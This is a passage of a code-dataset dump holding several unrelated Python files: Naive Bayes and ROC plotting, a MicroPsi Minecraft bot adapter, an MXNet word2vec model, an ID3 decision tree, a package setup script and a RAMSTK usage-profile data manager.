Naive_Bayes(Train,Dictionary,Class_Count):\n\tN_Words=len(Dictionary)\n\tN_Train=len(Train)\n\tCount=np.zeros([N_Words,3])\n\tfor i in xrange(0,N_Train):\n\t\tWords=Train[i][7].split()\n\t\tT_Count=np.zeros([N_Words,3])\n\t\tfor j in xrange(0,len(Words)):\n\t\t\tWord_Check=Words[j].strip('\"')\n\t\t\tWord_Check=Word_Check.strip('.')\n\t\t\tWord_Check=Word_Check.lower()\n\t\t\tif(Word_Check in Dictionary):\n\t\t\t\tDict_Index=Dictionary.index(Word_Check)\n\t\t\t\tT_Count[Dict_Index,0]=1\n\t\t\t\tif(Train[i][0]==1):\n\t\t\t\t\tT_Count[Dict_Index,1]=1\n\t\t\t\telse:\n\t\t\t\t\tT_Count[Dict_Index,2]=1\n\t\tCount=Count+T_Count\n\n\tProb=np.matrix([Count[:,0]/N_Train,Count[:,1]/Class_Count,Count[:,2]/(N_Train-Class_Count)])\n\treturn Prob\n\ndef ROC(Train,Prob,Save,N_Insult):\n\tN_Train=len(Train)\n\tBin_Width=0.01\n\tBins=np.arange(start=0.0,stop=1.0+Bin_Width,step=Bin_Width)\n\tN_Bins=len(Bins)\n\tFalse_Positives=np.empty([N_Bins])\n\tTrue_Positives=np.empty([N_Bins])\n\tfor i in xrange(0,N_Bins):\n\t\tTP_Count=0\n\t\tFP_Count=0\n\t\tfor j in xrange(0,N_Train):\n\t\t\tif(Prob[j]>=Bins[i]):\n\t\t\t\tif(Train[j][0]==1):\n\t\t\t\t\tTP_Count=TP_Count+1\n\t\t\t\telse:\n\t\t\t\t\tFP_Count=FP_Count+1\n\t\tTrue_Positives[i]=TP_Count/float(N_Insult)\n\t\tFalse_Positives[i]=FP_Count/float(FP_Count+N_Train-N_Insult)\n\tplt.plot(False_Positives,True_Positives)\n\tplt.xlim([0.0,1.0])\n\tplt.xlabel(\"False Positive Rate\")\n\tplt.ylim([0.0,1.0])\n\tplt.ylabel(\"True Positive 
Rate\")\n\tif(Save):\n\t\tplt.savefig(\"ROC.png\")\n\telse:\n\t\tplt.show()\n","sub_path":"Fcts.py","file_name":"Fcts.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"392471093","text":"import warnings\nfrom threading import Thread\nimport configparser\nfrom micropsi_core.world.world import World\nfrom micropsi_core.world.worldadapter import WorldAdapter\nfrom spock.plugins import DefaultPlugins\nfrom spock.client import Client\nfrom micropsi_core.world.minecraft import spockplugin\nfrom spock.plugins.helpers.clientinfo import ClientInfoPlugin\nfrom spock.plugins.helpers.move import MovementPlugin\nfrom spock.plugins.helpers.world import WorldPlugin\nfrom spock.plugins.core.event import EventPlugin\n\n\nclass Minecraft(World):\n \"\"\" mandatory: list of world adapters that are supported\"\"\"\n supported_worldadapters = ['MinecraftWorldadapter']\n\n assets = {\n 'x': 2048,\n 'y': 2048,\n }\n\n\n\n def __init__(self, filename, world_type=\"Minecraft\", name=\"\", owner=\"\", uid=None, version=1):\n from micropsi_core.runtime import add_signal_handler\n World.__init__(self, filename, world_type=world_type, name=name, owner=owner, uid=uid, version=version)\n self.current_step = 0\n self.data['assets'] = self.assets\n self.first_step = True\n self.chat_ping_counter = 0\n self.the_image = None\n\n plugins = DefaultPlugins\n plugins.append(ClientInfoPlugin)\n plugins.append(MovementPlugin)\n plugins.append(WorldPlugin)\n plugins.append(spockplugin.MicropsiPlugin)\n\n settings = {\n 'username': 'bot', #minecraft.net username or name for unauthenticated servers\n\t\t 'password': '', #Password for account, ignored if not authenticated\n\t\t 'authenticated': False, #Authenticate with authserver.mojang.com\n\t\t 'bufsize': 4096, #Size of socket buffer\n\t\t 'sock_quit': True, #Stop bot on socket error or hangup\n\t\t 'sess_quit': True, #Stop bot on failed session login\n\t\t 'thread_workers': 5, #Number of workers in the thread pool\n\t\t 'plugins': plugins,\n\t\t 'plugin_settings': {\n spockplugin.MicropsiPlugin: {\"worldadapter\": self},\n EventPlugin: {\"killsignals\": False}\n }, #Extra settings for plugins\n 'packet_trace': False,\n 'mc_username': \"sepp\",\n \"mc_password\": \"hugo\"\n }\n self.spock = Client(plugins=plugins, settings=settings)\n # the MicropsiPlugin will create self.spockplugin here on instantiation\n\n server_parameters = self.read_server_parameters()\n self.minecraft_communication_thread = Thread(target=self.spock.start, args=server_parameters)\n self.minecraft_communication_thread.start()\n add_signal_handler(self.kill_minecraft_thread)\n\n def step(self):\n World.step(self)\n\n def read_server_parameters(self):\n server = 'localhost'\n port = 25565\n\n try:\n config = configparser.ConfigParser()\n config.read_file(open('config.ini'))\n if 'minecraft_server' in config:\n server = config['minecraft_server']\n if 'minecraft_port' in config:\n port = config['minecraft_port']\n except OSError:\n warnings.warn('Could not read config.ini, falling back to defaults for minecraft server configuration.')\n\n return server, port\n\n def kill_minecraft_thread(self, *args):\n self.spockplugin.event.kill()\n self.minecraft_communication_thread.join()\n self.spockplugin.threadpool.shutdown(False)\n\n\nclass MinecraftWorldadapter(WorldAdapter):\n\n datasources = {'diamond_offset_x': 0,\n 'diamond_offset_z': 0,\n 'grd_stone': 0,\n 'grd_dirt': 0,\n 'grd_wood': 0,\n 'grd_coal': 0,\n 
'obstcl_x+': 0,\n 'obstcl_x-': 0,\n 'obstcl_z+': 0,\n 'obstcl_z-': 0}\n datatargets = {'move_x': 0,\n 'move_z': 0}\n\n\n def update(self):\n \"\"\"called on every world simulation step to advance the life of the agent\"\"\"\n #find diamond\n bot_x = self.world.spockplugin.clientinfo.position['x']\n bot_y = self.world.spockplugin.clientinfo.position['y']\n bot_z = self.world.spockplugin.clientinfo.position['z']\n bot_coords = (bot_x, bot_y, bot_z)\n x_chunk = bot_x // 16\n z_chunk = bot_z // 16\n current_column = self.world.spockplugin.world.map.columns[(x_chunk, z_chunk)]\n current_section = current_column.chunks[int((bot_y - 1) // 16)]\n\n self.detect_groundtypes(bot_coords, current_section)\n self.detect_diamond(current_column, bot_coords, x_chunk, z_chunk)\n self.detect_obstacles(bot_coords, current_section)\n\n move_x = self.datatargets['move_x']\n move_z = self.datatargets['move_z']\n\n self.world.spockplugin.psi_dispatcher.dispatchPsiCommands(bot_coords, current_section, move_x, move_z)\n\n\n def detect_diamond(self, current_column, bot_coords, x_chunk, z_chunk):\n for y in range(0, 16):\n current_section = current_column.chunks[int((bot_coords[1] + y - 10 // 2) // 16)] #TODO explain formula\n if current_section != None:\n for x in range(0, 16):\n for z in range(0, 16):\n current_block = current_section.get(x, int((bot_coords[1] + y - 10 // 2) % 16), z).id #TODO explain formula\n if current_block == 56:\n diamond_coords = (x + x_chunk * 16,y,z + z_chunk * 16)\n self.datasources['diamond_offset_x'] = bot_coords[0] - diamond_coords[0]\n self.datasources['diamond_offset_z'] = bot_coords[2] - diamond_coords[2]\n\n\n def detect_groundtypes(self, bot_coords, current_section):\n block_below = current_section.get(int(bot_coords[0]) % 16, int((bot_coords[1] - 1) % 16), int(bot_coords[2]) % 16).id\n self.datasources['grd_dirt'] = 1 if (block_below == 2) else 0\n self.datasources['grd_stone'] = 1 if (block_below == 1) else 0\n self.datasources['grd_wood'] = 1 if (block_below == 17) else 0\n self.datasources['grd_coal'] = 1 if (block_below == 173) else 0\n\n\n def detect_obstacles(self, bot_coords, current_section):\n self.datasources['obstcl_x+'] = 1 if current_section.get(int(bot_coords[0] + 1) % 16, int((bot_coords[1] + 1) % 16), int(bot_coords[2]) % 16).id != 0 else 0\n self.datasources['obstcl_x-'] = 1 if current_section.get(int(bot_coords[0] - 1) % 16, int((bot_coords[1] + 1) % 16), int(bot_coords[2]) % 16).id != 0 else 0\n self.datasources['obstcl_z+'] = 1 if current_section.get(int(bot_coords[0]) % 16, int((bot_coords[1] + 1) % 16), int(bot_coords[2] + 1) % 16).id != 0 else 0\n self.datasources['obstcl_z-'] = 1 if current_section.get(int(bot_coords[0]) % 16, int((bot_coords[1] + 1) % 16), int(bot_coords[2] - 1) % 16).id != 0 else 0","sub_path":"micropsi_core/world/minecraft/minecraft.py","file_name":"minecraft.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587706312","text":"import os, sys\nsys.path.insert(0, \"../../python\")\nimport mxnet as mx\nimport numpy as np\n\ndef is_param_name(name):\n return name.endswith('weight')\\\n or name.endswith('bias')\\\n or name.endswith('gamma')\\\n or name.endswith('beta')\n\nclass SkipGram(object):\n def __init__(self, ctx, input_size, num_embed, batch_size, update_period, opt_params):\n self._build_model(ctx, input_size, num_embed, batch_size, opt_params)\n self._examples_passed = 0\n self.update_period = update_period\n self.input_size = 
input_size\n self.num_embed = num_embed\n self.batch_size = batch_size\n\n def _build_model(self, ctx, input_size, num_embed, batch_size, opt_params):\n input_weight = mx.sym.Variable('input_weight')\n output_weight = mx.sym.Variable('output_weight')\n middle_word = mx.sym.Variable('middle_word')\n ctx_word = mx.sym.Variable('ctx_word')\n label = mx.sym.Variable('label')\n\n input_embed = mx.sym.Embedding(data=middle_word,\n weight=input_weight,\n input_dim=input_size,\n output_dim=num_embed,\n name='input_embed')\n\n output_embed = mx.sym.Embedding(data=ctx_word,\n weight=output_weight,\n input_dim=input_size,\n output_dim=num_embed,\n name='output_embed')\n\n els_prod = input_embed * output_embed\n slice_layers = mx.sym.SliceChannel(data=els_prod,\n num_outputs=num_embed,\n name='slice_layer')\n slice_layers = [slice_layers[i] for i in range(num_embed)]\n els_sum = mx.sym.ElementWiseSum(*slice_layers,\n num_args=num_embed,\n name='elementwise_sum')\n\n sigmoid = mx.symbol.Activation(name='sigmoid',\n data=els_sum,\n act_type='sigmoid')\n\n model = mx.symbol.LogisticRegressionOutput(data=sigmoid, label=label, name='cross_entropy')\n\n arg_names = model.list_arguments()\n input_shapes = {}\n\n for name in arg_names:\n if name.endswith('word'):\n input_shapes[name] = (batch_size,)\n elif name.endswith('label'):\n input_shapes[name] = (batch_size,)\n\n arg_shape, out_shape, aux_shape = model.infer_shape(**input_shapes)\n arg_arrays = [mx.nd.zeros(s, ctx) for s in arg_shape]\n for i in range(len(arg_shape)):\n arg_arrays[i][:] = mx.rnd.uniform(-0.1, 0.1, arg_shape[i])\n\n arg_grad = {}\n for shape, name in zip(arg_shape, arg_names):\n if is_param_name(name):\n arg_grad[name] = mx.nd.zeros(shape, ctx)\n arg_dict = dict(zip(arg_names, arg_arrays))\n\n self.model = model\n self.label = label\n self.arg_arrays = arg_arrays\n self.arg_dict = arg_dict\n self.arg_grad = arg_grad\n\n grad_req = {}\n for name in arg_names:\n if name.endswith('word') or name.endswith('label'):\n grad_req[name] = 'null'\n else:\n grad_req[name] = 'write'\n\n self.embed_exec = model.bind(ctx=ctx,\n args=self.arg_dict,\n args_grad=self.arg_grad,\n grad_req=grad_req)\n\n\n params_blocks = []\n for i, name in enumerate(arg_names):\n if is_param_name(name):\n params_blocks.append((i, arg_dict[name], arg_grad[name], name))\n self.params_blocks = params_blocks\n\n opt = mx.optimizer.create('sgd', **opt_params)\n updater = mx.optimizer.get_updater(opt)\n self.updater = updater\n\n\n def fit(self, batch):\n middle_words = map(lambda x: x[0][0], batch)\n context_words = map(lambda x: x[0][1], batch)\n labels = map(lambda x: x[1], batch)\n mx.nd.array(middle_words).copyto(self.arg_dict['middle_word'])\n mx.nd.array(context_words).copyto(self.arg_dict['ctx_word'])\n mx.nd.array(labels).copyto(self.arg_dict['label'])\n self.embed_exec.forward(is_train=True)\n self.embed_exec.backward()\n\n self._examples_passed += 1\n if self._examples_passed % self.update_period == 0:\n for idx, weight, grad, name in self.params_blocks:\n self.updater(idx, grad, weight)\n grad[:] = 0.0\n\n def get_embedding_cpu(self):\n embedding = np.zeros((self.input_size, self.num_embed))\n self.arg_dict['input_weight'].copyto(embedding)\n\n return embedding\n","sub_path":"example/word2vec/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282447106","text":"\"\"\" Yoga database module \"\"\"\nfrom yogaflow.reader.abstract_reader 
import AbstractReader\n\nclass YogaDatabase:\n \"\"\" Yoga database class \"\"\"\n def __init__(self, reader: AbstractReader):\n self._reader = reader\n self.classes = reader.get_yoga_classes()\n self.pranayamas = reader.get_pranayamas()\n self.warmups = reader.get_warmups()\n self.asanas = reader.get_asanas()\n self.flows = reader.get_flows(self.asanas)\n self.meditations = reader.get_meditations()\n","sub_path":"yogaflow/reader/yoga_database.py","file_name":"yoga_database.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137161433","text":"from math import log\nfrom .noeud_de_decision_continu import NoeudDeDecision_continu\nfrom statistics import mean\n\n#import matplotlib.pyplot as plt\n\ndef binarise(input):\n if input < 0.5: return 0\n else: return 1\n\ndef variance(input):\n if len(input) > 1:\n return (1/len(input)) * sum(list(map(lambda x: float(x[0]) - mean(map(lambda x: float(x[0]),input)), input)))\n else:\n return 0\n\nclass ID3_continu:\n \"\"\" Algorithme ID3. \n\n This is an updated version from the one in the book (Intelligence Artificielle par la pratique).\n Specifically, in construit_arbre_recur(), if donnees == [] (line 70), it returns a terminal node with the predominant class of the dataset -- as computed in construit_arbre() -- instead of returning None.\n Moreover, the predominant class is also passed as a parameter to NoeudDeDecision().\n \"\"\"\n \n def construit_arbre(self, donnees):\n \"\"\" Construit un arbre de décision à partir des données d'apprentissage.\n\n :param list donnees: les données d'apprentissage\\\n ``[classe, {attribut -> valeur}, ...]``.\n :return: une instance de NoeudDeDecision_continu correspondant à la racine de\\\n l'arbre de décision.\n \"\"\"\n \n # Nous devons extraire les domaines de valeur des \n # attributs, puisqu'ils sont nécessaires pour \n # construire l'arbre.\n attributs = {}\n for donnee in donnees:\n for attribut, valeur in donnee[1].items():\n valeurs = attributs.get(attribut)\n if valeurs is None:\n valeurs = set()\n attributs[attribut] = valeurs\n valeurs.add(valeur)\n\n # Find the predominant class\n classes = set([row[0] for row in donnees])\n # print(classes)\n predominant_class_counter = -1\n for c in classes:\n # print([row[0] for row in donnees].count(c))\n if [row[0] for row in donnees].count(c) >= predominant_class_counter:\n predominant_class_counter = [row[0] for row in donnees].count(c)\n predominant_class = c\n # print(predominant_class)\n \n arbre = self.construit_arbre_recur(donnees, attributs, predominant_class)\n\n return arbre\n\n def construit_arbre_recur(self, donnees, attributs, predominant_class):\n \"\"\" Construit rédurcivement un arbre de décision à partir \n des données d'apprentissage et d'un dictionnaire liant\n les attributs à la liste de leurs valeurs possibles.\n\n :param list donnees: les données d'apprentissage\\\n ``[classe, {attribut -> valeur}, ...]``.\n :param attributs: un dictionnaire qui associe chaque\\\n attribut A à son domaine de valeurs a_j.\n :return: une instance de NoeudDeDecision_continu correspondant à la racine de\\\n l'arbre de décision.\n \"\"\"\n \n def classe_unique(donnees):\n \"\"\" Vérifie que toutes les données appartiennent à la même classe. 
\"\"\"\n \n if len(donnees) == 0:\n return True \n premiere_classe = donnees[0][0]\n for donnee in donnees:\n if donnee[0] != premiere_classe:\n return False \n return True\n\n def valeurs_possibles(donnees_input, attribut):\n values = list(map(lambda x : float(x[1][attribut]), donnees_input))\n return sorted(list(dict.fromkeys(values)))\n\n def partition(attribut):\n \n def score(cut):\n def pre_class(dataset):\n return binarise(mean(list(map(lambda x: float(x[0]), dataset))))\n\n lV = list(filter(lambda x: float(x[1][attribut]) <= cut, donnees))\n hV = list(filter(lambda x: float(x[1][attribut]) > cut, donnees))\n lS = self.h_C_A(lV, attribut, valeurs_possibles(lV,attribut)) #variance(lV)*len(lV) #len(list(filter(lambda x: int(x[0]) == int(pre_class(lV)), lV)))\n hS = self.h_C_A(hV, attribut, valeurs_possibles(hV,attribut))#variance(hV)*len(hV) #len(list(filter(lambda x: int(x[0]) == int(pre_class(hV)), hV)))\n\n return lS + hS\n\n vals = valeurs_possibles(donnees, attribut)\n cuts = [(vals[i]+vals[i-1])/2 for i in range(1,len(vals))]\n scores = [(score(cut),cut) for cut in cuts]\n thresh = max(scores, key =lambda x : x[0])[1]\n lV = list(filter(lambda x: float(x[1][attribut]) <= thresh, donnees))\n hV = list(filter(lambda x: float(x[1][attribut]) > thresh, donnees))\n return {'hV':hV, 'lV':lV, 'thresh':thresh}\n\n if donnees == []:\n return NoeudDeDecision_continu(None, [str(predominant_class), dict()], str(predominant_class))\n\n # Si toutes les données restantes font partie de la même classe,\n # on peut retourner un noeud terminal. \n elif classe_unique(donnees) or len(attributs) == 0:\n return NoeudDeDecision_continu(None, donnees, str(predominant_class))\n \n else:\n # Sélectionne l'attribut qui réduit au maximum l'entropie.\n h_C_As_attribs = [(self.h_C_A(donnees, attribut, attributs[attribut])/len(valeurs_possibles(donnees,attribut)), len(valeurs_possibles(donnees,attribut)),\n attribut) for attribut in attributs]\n \n #print(h_C_As_attribs)\n \n #print(h_C_As_attribs)\n attribut = min(h_C_As_attribs, key=lambda h_a: h_a[0])[2]\n\n #print(attribut)\n #print(len(donnees))\n\n if len(valeurs_possibles(donnees,attribut)) > 1:\n part = partition(attribut)\n \n # Crée les sous-arbres de manière récursive.\n attributs_restants = attributs.copy()\n del attributs_restants[attribut]\n \n #partitions = self.partitionne(donnees, attribut, attributs[attribut])\n \n enfants = {}\n enfants['low'] = self.construit_arbre_recur(part['lV'], attributs_restants, predominant_class)\n enfants['high'] = self.construit_arbre_recur(part['hV'], attributs_restants, predominant_class)\n return NoeudDeDecision_continu(attribut, donnees, str(predominant_class), enfants, seuil=part['thresh'])\n else: \n # Crée les sous-arbres de manière récursive.\n attributs_restants = attributs.copy()\n del attributs_restants[attribut]\n\n enfants = {}\n enfants['unique'] = self.construit_arbre_recur(donnees, attributs_restants, predominant_class)\n \n return NoeudDeDecision_continu(attribut, donnees, str(predominant_class), enfants)\n \n def p_aj(self, donnees, attribut, valeur):\n \"\"\" p(a_j) - la probabilité que la valeur de l'attribut A soit a_j.\n\n :param list donnees: les données d'apprentissage.\n :param attribut: l'attribut A.\n :param valeur: la valeur a_j de l'attribut A. 
\n :return: p(a_j)\n \"\"\"\n # Nombre de données.\n nombre_donnees = len(donnees)\n \n # Permet d'éviter les divisions par 0.\n if nombre_donnees == 0:\n return 0.0\n \n # Nombre d'occurrences de la valeur a_j parmi les données.\n nombre_aj = 0\n for donnee in donnees:\n if donnee[1][attribut] == valeur:\n nombre_aj += 1\n\n # p(a_j) = nombre d'occurrences de la valeur a_j parmi les données / \n # nombre de données.\n return nombre_aj / nombre_donnees\n\n def p_ci_aj(self, donnees, attribut, valeur, classe):\n \"\"\" p(c_i|a_j) - la probabilité conditionnelle que la classe C soit c_i\\\n étant donné que l'attribut A vaut a_j.\n\n :param list donnees: les données d'apprentissage.\n :param attribut: l'attribut A.\n :param valeur: la valeur a_j de l'attribut A.\n :param classe: la valeur c_i de la classe C.\n :return: p(c_i | a_j)\n \"\"\"\n # Nombre d'occurrences de la valeur a_j parmi les données.\n donnees_aj = [donnee for donnee in donnees if donnee[1][attribut] == valeur]\n nombre_aj = len(donnees_aj)\n \n # Permet d'éviter les divisions par 0.\n if nombre_aj == 0:\n return 0\n \n # Nombre d'occurrences de la classe c_i parmi les données pour lesquelles \n # A vaut a_j.\n donnees_ci = [donnee for donnee in donnees_aj if donnee[0] == classe]\n nombre_ci = len(donnees_ci)\n\n # p(c_i|a_j) = nombre d'occurrences de la classe c_i parmi les données \n # pour lesquelles A vaut a_j /\n # nombre d'occurrences de la valeur a_j parmi les données.\n return nombre_ci / nombre_aj\n\n def h_C_aj(self, donnees, attribut, valeur):\n \"\"\" H(C|a_j) - l'entropie de la classe parmi les données pour lesquelles\\\n l'attribut A vaut a_j.\n\n :param list donnees: les données d'apprentissage.\n :param attribut: l'attribut A.\n :param valeur: la valeur a_j de l'attribut A.\n :return: H(C|a_j)\n \"\"\"\n # Les classes attestées dans les exemples.\n classes = list(set([donnee[0] for donnee in donnees]))\n \n # Calcule p(c_i|a_j) pour chaque classe c_i.\n p_ci_ajs = [self.p_ci_aj(donnees, attribut, valeur, classe) \n for classe in classes]\n\n # Si p vaut 0 -> plog(p) vaut 0.\n return -sum([p_ci_aj * log(p_ci_aj, 2.0) \n for p_ci_aj in p_ci_ajs \n if p_ci_aj != 0])\n\n def h_C_A(self, donnees, attribut, valeurs):\n \"\"\" H(C|A) - l'entropie de la classe après avoir choisi de partitionner\\\n les données suivant les valeurs de l'attribut A.\n \n :param list donnees: les données d'apprentissage.\n :param attribut: l'attribut A.\n :param list valeurs: les valeurs a_j de l'attribut A.\n :return: H(C|A)\n \"\"\"\n # Calcule P(a_j) pour chaque valeur a_j de l'attribut A.\n p_ajs = [self.p_aj(donnees, attribut, valeur) for valeur in valeurs]\n\n # Calcule H_C_aj pour chaque valeur a_j de l'attribut A.\n h_c_ajs = [self.h_C_aj(donnees, attribut, valeur) \n for valeur in valeurs]\n\n return sum([p_aj * h_c_aj for p_aj, h_c_aj in zip(p_ajs, h_c_ajs)])\n","sub_path":"moteur_id3/id3_continu.py","file_name":"id3_continu.py","file_ext":"py","file_size_in_byte":10718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"92403381","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\nimport os\n\nrequirements = [i for i in open('requirements.txt').read().split() if not i.startswith('--') and len(i) > 0]\n\ndef get_long_description(fname):\n try:\n import pypandoc\n return pypandoc.convert(fname, 'rst')\n except:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(name='shiftpi',\n version=\"0.4.6\",\n description=\"ShiftPi is the easiest way 
to work with 74HC595 shift registers on your Raspberry Pi.\",\n author='Gwilyn Saunders',\n author_email='gwilyn.saunders@mk2es.com.au',\n url='https://git.mk2es.com.au/mk2/shiftpi',\n packages=['shiftpi'],\n install_requires=requirements,\n long_description=get_long_description('README.md'),\n classifiers=[\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: BSD',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Topic :: System :: Shells',\n 'Topic :: Utilities',\n ],\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302267014","text":"# -*- coding: utf-8 -*-\n#\n# ramstk.controllers.usage_profile.datamanager.py is part of The RAMSTK\n# Project\n#\n# All rights reserved.\n# Copyright 2007 - 2020 Doyle Rowland doyle.rowland reliaqual com\n\"\"\"Usage Profile Package Data Model.\"\"\"\n\n# Standard Library Imports\nimport inspect\nfrom typing import Any, Dict, List\n\n# Third Party Imports\nfrom pubsub import pub\nfrom treelib.exceptions import NodeIDAbsentError\n\n# RAMSTK Package Imports\nfrom ramstk.controllers import RAMSTKDataManager\nfrom ramstk.exceptions import DataAccessError\nfrom ramstk.models.programdb import (\n RAMSTKEnvironment, RAMSTKMission, RAMSTKMissionPhase\n)\n\n\nclass DataManager(RAMSTKDataManager):\n \"\"\"Contain the attributes and methods of the Usage Profile data manager.\n\n This class manages the usage profile data from the RAMSTKMission,\n RAMSTKMissionPhase, and RAMSKTEnvironment data models.\n \"\"\"\n\n _tag = 'usage_profile'\n\n def __init__(self, **kwargs: Dict[Any, Any]) -> None:\n \"\"\"Initialize a RAMSTKFailureDefinition, data manager instance.\"\"\"\n super().__init__(**kwargs)\n\n # Initialize private dictionary attributes.\n\n # Initialize private list attributes.\n\n # Initialize private scalar attributes.\n\n # Initialize public dictionary attributes.\n self.last_id: Dict[str, int] = {\n 'mission': -1,\n 'mission_phase': -1,\n 'environment': -1,\n }\n\n # Initialize public list attributes.\n\n # Initialize public scalar attributes.\n\n # Subscribe to PyPubSub messages.\n pub.subscribe(super().do_get_attributes,\n 'request_get_usage_profile_attributes')\n pub.subscribe(super().do_update_all,\n 'request_update_all_usage_profiles')\n\n pub.subscribe(self.do_select_all, 'selected_revision')\n pub.subscribe(self.do_get_tree, 'request_get_usage_profile_tree')\n pub.subscribe(self.do_update, 'request_update_usage_profile')\n\n pub.subscribe(self._do_delete, 'request_delete_usage_profile')\n pub.subscribe(self._do_insert_environment,\n 'request_insert_environment')\n pub.subscribe(self._do_insert_mission, 'request_insert_mission')\n pub.subscribe(self._do_insert_mission_phase,\n 'request_insert_mission_phase')\n pub.subscribe(self._do_set_attributes,\n 'request_set_usage_profile_attributes')\n pub.subscribe(self._do_set_attributes, 'lvw_editing_usage_profile')\n pub.subscribe(self._do_set_all_attributes,\n 'request_set_all_usage_profile_attributes')\n\n def do_get_tree(self) -> None:\n \"\"\"Retrieve the revision treelib Tree.\n\n :return: None\n :rtype: None\n \"\"\"\n pub.sendMessage(\n 'succeed_get_usage_profile_tree',\n tree=self.tree,\n )\n\n def do_select_all(self, attributes: Dict[str, Any]) -> None:\n \"\"\"Retrieve the Usage Profile data from the RAMSTK Program database.\n\n :param 
attributes: the attributes for the selected Revision.\n :return: None\n :rtype: None\n \"\"\"\n self._revision_id = attributes['revision_id']\n\n for _node in self.tree.children(self.tree.root):\n self.tree.remove_node(_node.identifier)\n\n for _mission in self.dao.do_select_all(RAMSTKMission,\n key=['revision_id'],\n value=[self._revision_id]):\n self.tree.create_node(tag='mission',\n identifier='{0:d}'.format(\n _mission.mission_id),\n parent=self._root,\n data={'usage_profile': _mission})\n self.last_id['mission'] = _mission.mission_id\n\n for _phase in self.dao.do_select_all(RAMSTKMissionPhase,\n key=['mission_id'],\n value=[_mission.mission_id]):\n self.tree.create_node(tag='mission_phase',\n identifier='{0:d}.{1:d}'.format(\n _mission.mission_id,\n _phase.phase_id),\n parent=str(_mission.mission_id),\n data={'usage_profile': _phase})\n self.last_id['mission_phase'] = _phase.phase_id\n\n for _environment in self.dao.do_select_all(\n RAMSTKEnvironment,\n key=['phase_id'],\n value=[_phase.phase_id]):\n self.tree.create_node(\n tag='environment',\n identifier='{0:d}.{1:d}.{2:d}'.format(\n _mission.mission_id, _phase.phase_id,\n _environment.environment_id),\n parent='{0:d}.{1:d}'.format(_mission.mission_id,\n _phase.phase_id),\n data={'usage_profile': _environment})\n self.last_id['environment'] = _environment.environment_id\n\n pub.sendMessage(\n 'succeed_retrieve_usage_profile',\n tree=self.tree,\n )\n\n def do_update(self, node_id: str) -> None:\n \"\"\"Update record associated with node ID in RAMSTK Program database.\n\n :param node_id: the node (usage profile) ID of the record to save.\n :return: None\n :rtype: None\n \"\"\"\n _method_name: str = inspect.currentframe( # type: ignore\n ).f_code.co_name\n\n try:\n self.dao.do_update(\n self.tree.get_node(node_id).data['usage_profile'])\n pub.sendMessage(\n 'succeed_update_usage_profile',\n tree=self.tree,\n )\n except AttributeError:\n _error_msg: str = (\n '{1}: Attempted to save non-existent usage profile ID {'\n '0}.').format(str(node_id), _method_name)\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error_msg,\n )\n pub.sendMessage(\n 'fail_update_usage_profile',\n error_message=_error_msg,\n )\n except (KeyError, TypeError):\n if node_id != 0:\n _error_msg = (\n '{1}: No data package found for usage profile ID {'\n '0}.').format(str(node_id), _method_name)\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error_msg,\n )\n pub.sendMessage(\n 'fail_update_usage_profile',\n error_message=_error_msg,\n )\n\n def _do_delete(self, node_id: int) -> None:\n \"\"\"Remove a usage profile element.\n\n :param node_id: the usage profile element ID to remove.\n :return: None\n :rtype: None\n \"\"\"\n try:\n super().do_delete(node_id, 'usage_profile')\n\n self.tree.remove_node(node_id)\n\n pub.sendMessage(\n 'succeed_delete_usage_profile',\n tree=self.tree,\n )\n except (DataAccessError, NodeIDAbsentError):\n _method_name: str = inspect.currentframe( # type: ignore\n ).f_code.co_name\n _error_msg: str = (\n '{1}: Attempted to delete non-existent usage profile ID {0}.'\n ).format(str(node_id), _method_name)\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error_msg,\n )\n pub.sendMessage(\n 'fail_delete_usage_profile',\n error_message=_error_msg,\n )\n\n def _do_insert_environment(self, mission_id: int, phase_id: int) -> None:\n \"\"\"Add a new environment for phase ID.\n\n :param mission_id: the mission ID to add the new environment.\n :param phase_id: the mission phase ID to add 
the new environment.\n :return: None\n :rtype: None\n \"\"\"\n try:\n _last_id = self.dao.get_last_id('ramstk_environment',\n 'environment_id')\n _environment = RAMSTKEnvironment()\n _environment.phase_id = phase_id\n _environment.environment_id = _last_id + 1\n\n self.dao.do_insert(_environment)\n\n _phase_id = '{0:s}.{1:s}'.format(str(mission_id), str(phase_id))\n _node_id = '{0:s}.{1:s}.{2:s}'.format(\n str(mission_id), str(phase_id),\n str(_environment.environment_id))\n self.tree.create_node(tag='environment',\n identifier=_node_id,\n parent=_phase_id,\n data={'usage_profile': _environment})\n self.last_id['environment'] = _environment.environment_id\n pub.sendMessage(\n \"succeed_insert_usage_profile\",\n node_id=_node_id,\n tree=self.tree,\n )\n except DataAccessError as _error:\n pub.sendMessage(\n 'do_log_debug',\n logger_name='DEBUG',\n message=_error.msg,\n )\n pub.sendMessage(\n \"fail_insert_usage_profile\",\n error_message=_error.msg,\n )\n\n def _do_insert_mission(self) -> None:\n \"\"\"Add a new mission for revision ID.\n\n :return: None\n :rtype: None\n \"\"\"\n try:\n _last_id = self.dao.get_last_id('ramstk_mission', 'mission_id')\n _mission = RAMSTKMission()\n _mission.revision_id = self._revision_id\n _mission.mission_id = _last_id + 1\n\n self.dao.do_insert(_mission)\n\n _node_id = '{0:d}'.format(_mission.mission_id)\n\n self.tree.create_node(tag='mission',\n 